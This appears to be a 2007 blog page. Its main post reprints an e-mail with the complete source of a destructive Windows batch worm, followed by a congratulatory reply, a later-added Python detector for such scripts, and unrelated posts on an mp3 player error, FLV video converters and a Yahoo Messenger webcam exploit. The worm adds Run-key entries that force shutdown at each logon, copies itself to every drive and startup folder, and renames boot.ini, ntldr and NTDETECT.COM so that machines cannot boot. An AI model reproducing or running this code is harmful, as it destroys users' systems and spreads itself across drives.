Noteable Posts

Sunday, August 26, 2007

Anatomy of a worm written with plain Windows batch commands

On 8/26/07, Shezan <shezan2k7@gmail.com> wrote:
Yes, I created it with Notepad. I actually created an MS-DOS .bat file using Notepad and then converted the shezan.bat file to .exe using bat2exe software. It's nothing. I just cobbled it together somehow... Check the source code.....
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! I used to do this long ago lol ... But I haven't worked with .bat files since 1999.
And good that you've found a great security hole Windows has. It's a security hole because Windows lets the program change certain settings without taking precautions. Have you tested the renaming part of this?
Now listen.. it's nowhere near a virus. It's just malware. A virus needs lots of capabilities to be called a virus: replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can, though, be called a worm. You used sub7's icon with your .exe file, that's why I thought it was a sub7 variant.
12-16 is your birthday?
Enough with batch coding, now learn real programming with C++, C#, Java etc.
Antiviruses detect it as those test in heuristic mode...
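
A defender-side way to triage a script like the one quoted above, added here as an example (it is not part of the original e-mails): a small Python static check that tags the behaviours visible in the listing and resolves `SET` variables first, since the script hides the Run key path in `%KEY%`. The tag names and the functions `triage` and `looks_destructive` are made up for this example, and the sample is a constructed excerpt of the quoted script.

```python
import re
from collections import Counter

RUN_KEY = r"\microsoft\windows\currentversion\run"
BOOT_RE = re.compile(r"[a-z]:\\(boot\.ini|ntldr|ntdetect\.com)\b")

# Constructed sample: a short excerpt of the script quoted above.
SAMPLE = r'''@echo off
date 12-16-2020 | time 16:00:47.47
SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f
copy shezan.exe d:
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini
ren D:\ntldr shezanldr
'''

def triage(script):
    """Count behaviour tags (names are this example's own) in a batch script."""
    env, hits = {}, Counter()
    for raw in script.splitlines():
        # Expand %VAR% from earlier SET lines: the script hides the Run key
        # path in %KEY%, so a match on the raw REG ADD line would miss it.
        line = re.sub(r"%(\w+)%",
                      lambda m: env.get(m.group(1).upper(), m.group(0)),
                      raw.strip())
        low = line.lower()
        m = re.match(r"set\s+(\w+)=(.*)", line, re.I)
        if m:
            env[m.group(1).upper()] = m.group(2)
        elif re.match(r"reg\s+add\s", low) and RUN_KEY in low:
            hits["run_key_persistence"] += 1
        elif re.match(r"copy\s", low) and r"\start menu\programs\startup" in low:
            hits["startup_folder_drop"] += 1
        elif re.match(r"copy\s+\S+\s+[a-z]:$", low):
            hits["drive_root_copy"] += 1
        elif re.match(r"(attrib|ren|rename|del)\s", low) and BOOT_RE.search(low):
            hits["boot_file_tamper"] += 1
        elif re.match(r"(date|time)\s+\d", low):
            hits["clock_change"] += 1
    return hits

def looks_destructive(hits):
    """Persistence plus boot-loader tampering is the combination seen above."""
    return hits["run_key_persistence"] > 0 and hits["boot_file_tamper"] > 0

if __name__ == "__main__":
    result = triage(SAMPLE)
    for tag, count in sorted(result.items()):
        print(f"{tag}: {count}")
    print("destructive:", looks_destructive(result))
```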

Problem in mp3 player

On 25 Aug 2007 19:54:37 -0000, Zaman <visit****@rediffmail.com> wrote:
hi,
I'm facing problem with my mp3 player....
it's working well when I connect it to my computer through USB port....
but when I click on safely remove hardware on task bar to disconnect it from pc the computer shows me the message
that "problem ejecting mass storage device", "The device generic volume cannot be stopped right now.
Try stopping the device again later".
what should I do?
Thank you.

Your PC might be infected with a virus which tries to access the removable device when you are not. Maybe that's why it's giving that error. Before ejecting, make sure you closed all windows which opened any media from your MP3 player. And also check with an antivirus if you can't get rid of the problem. If the device is busy it won't release, remember that.
Thanks

Tuesday, August 21, 2007

Convert Flash Video .flv Files to .mpg or .avi and Other Media Formats

With some tricks, it's now possible to download the videos that are hosted and shared on online video sites such as YouTube and Google Video, instead of just watching the video embedded on the websites.

Some video files that are downloaded from these online video hosting sites may be in Flash Video (.flv) format. For whatever reason, such as preferring to view and store the videos in MPEG format, wanting to play the offline video clips on a portable player such as a PSP or iPod, or simply not liking to view them with an FLV player, you may need to convert the .flv video format to another format such as .avi, .mov, .wmv or .mpg. There are several tools and conversion utilities that can be used to do the media format conversion.

Riva FLV Encoder

Able to decode Flash Video into AVI, MPEG, QuickTime and WMV. The utility can also encode into Flash Video, and comes with an FLV player. The conversion may run into the issue that the audio codec cannot be transcoded. For a solution and a conversion tutorial, visit VideoHelp.

Total Video Converter

A total solution to video conversion which supports reading, playing lots of video and audio formats and converting them to popular video formats. Supported source/input file formats include:

Video Formats:

  • Rmvb(.rm,.rmvb)
  • MPEG4(.mp4)
  • 3gp(.3gp, 3g2)
  • Game Psp(.psp)
  • MPEG1(.mpg, mpeg)
  • MPEG2 PS (.mpg, mpeg, vob)
  • MPEG2 TS (DVB Transport Stream)
  • Ms ASF(.asf, .wmv)
  • Ms AVI(.avi)
  • Macromedia Flash video FLV (.flv)
  • Real Video (rm)
  • Apple Quicktime(.mov)
  • FLIC format(.fli, .flc)
  • Gif Animation(.gif)
  • DV (.dv)
  • Video Formats Dx9 Directshow can open

Audio Formats:

  • CD audio(.cda)
  • MPEG audio(.mp3, mp2)
  • Ms WAV(.wav)
  • Ms WMA(.wma)
  • Real Audio (.ra)
  • OGG(.ogg)
  • Amr audio(.amr)
  • AC3(.ac3)
  • SUN AU format (.au)
  • Macromedia Flash embedded audio(.swf)
  • Audio Formats Dx9 Directshow can open

Game Video Formats:

  • Technologies format, used in some games(.4xm)
  • Playstation STR
  • Id RoQ used in Quake III, Jedi Knight 2, other computer games
  • format used in various Interplay computer games, Interplay MVE
  • multimedia format used in Origin's Wing Commander III computer game,WC3 Movie
  • used in many Sega Saturn console games, Sega FILM/CPK
  • Multimedia formats used in Westwood Studios games, Westwood Studios VQA/AUD
  • Used in Quake II, Id Cinematic (.cin)
  • used in Sierra CD-ROM games, Sierra VMD
  • used in Sierra Online games, .sol files
  • Electronic Arts Multimedia, Matroska
  • used in various EA games; files have extensions like WVE and UV2
  • Nullsoft Video (NSV) format

Total Video Converter is able to convert any of the file formats above to the following video media formats, including mobile video and audio formats (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cellphones, PDAs, PSP and iPod:

Video Formats:

  • MPEG4(.mp4)
  • 3gp(.3gp, 3g2)
  • Game Psp(.psp)
  • MPEG1(.mpg, mpeg)
  • NTSC, PAL DVD mpeg
  • NTSC, PAL SVCD mpeg
  • NTSC, PAL VCD mpeg
  • Ms Mpeg4 AVI(.avi)
  • Divx AVI(.avi)
  • Xvid AVI(.avi)
  • H264 AVI(.avi)
  • Mjpeg AVI(.avi)
  • HuffYUV AVI(.avi)
  • Swf Video(.swf)
  • Flv Video (.flv)
  • Gif Animation(.gif)
  • Mpeg4 Mov(.mov)
  • Apple Quicktime(.mov)
  • FLIC format(.fli, .flc)
  • DV (.dv)

Audio Formats:

  • MPEG audio(.mp3, mp2)
  • Ms WAV(.wav)
  • Ms WMA(.wma)
  • OGG(.ogg)
  • Amr audio(.amr)
  • AC3(.ac3)
  • SUN AU format (.au)
  • m4a(mp4 audio)

SUPER - Simplified Universal Player Encoder & Renderer

SUPER supports a wide variety of input/source file formats to play, encode and decode without any additional third-party software. It's a GUI for ffmpeg, mencoder, mplayer, ffmpeg2theora and the theora/vorbis RealProducer plug-in. SUPER is a simple yet very efficient tool to convert (encode) or play any multimedia file; most video formats are supported, as are portable formats for PSP, iPod, PocketPC and NEC, Nokia, Siemens and SonyEricsson devices.

FLV Online Converter

A free online FLV converter that grabs the video from a YouTube embedded web page, converts it on the fly and lets you download the properly converted video.

Media Convert

A universal media and file format converter which is also able to convert the FLV Flash Video format to another video format.

VDownloader or Web Video Downloader

A free utility that downloads Flash video from YouTube, Google Video, Grinvi and DailyMotion, and then automatically converts the Flash video (FLV) to a supported video format such as AVI, MPEG (MPG) or PSP video files. A kill-two-birds-with-one-stone application if you plan to download your Flash video from online video sharing and hosting sites.

MPlayer's MEncoder

MEncoder is an all-purpose encoder that is part of MPlayer, a movie player which runs on many systems. It plays most MPEG/VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia, Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ and PVA files, supported by many native, XAnim, and Win32 DLL codecs. MEncoder is command-line based with a limited GUI. It supports the same wide range of file formats as MPlayer, and it also enables format conversion to be done on x86, Unix, Linux, Red Hat, Mac OS X and other non-x86 systems.

Example of MEncoder command-line syntax:

mencoder input.flv -ofps 15 -vf scale=300:-2 -oac lavc -ovc lavc -lavcopts vcodec=msmpeg4v2:acodec=mp3:abitrate=64 -o output.avi

Replace input.flv and output.avi with your desired file names.

iSquint

iSquint is an iPod video conversion application for Mac OS X. It will convert most popular video formats, including .flv into .mp4 format.

PSP Video 9

PSP Video 9 is a free PSP video conversion and management application. It can convert regular PC video files (avi, mpeg, flv etc.) into PSP video files that can play on the PSP portable player, as well as manage/copy these PSP video files between your PC and PSP.

Videora iPod Converter

Videora iPod Converter is a free video conversion application that converts your regular PC video files (avi, mpeg, flv etc.) into the proper video format that can play on your iPod.

Get help or contribute tips or tricks at My Digital Life Forums.

Yahoo Messenger's Webcam invites may cause trouble

There's a new zero-day attack in progress against Yahoo Messenger users. The instant messaging solicitation invites users to open their Webcam. However, the code used in this China-based exploit causes a heap overflow to be triggered when the target accepts a Webcam invitation. That means a remote attacker could execute malicious code on a compromised machine.

The McAfee security blog recommends the following: do not accept Webcam invites from untrusted sources until a patch is released, and block outgoing traffic on TCP port 5100 on your firewall until a patch is released.

Yahoo has been informed and says it is working on a patch.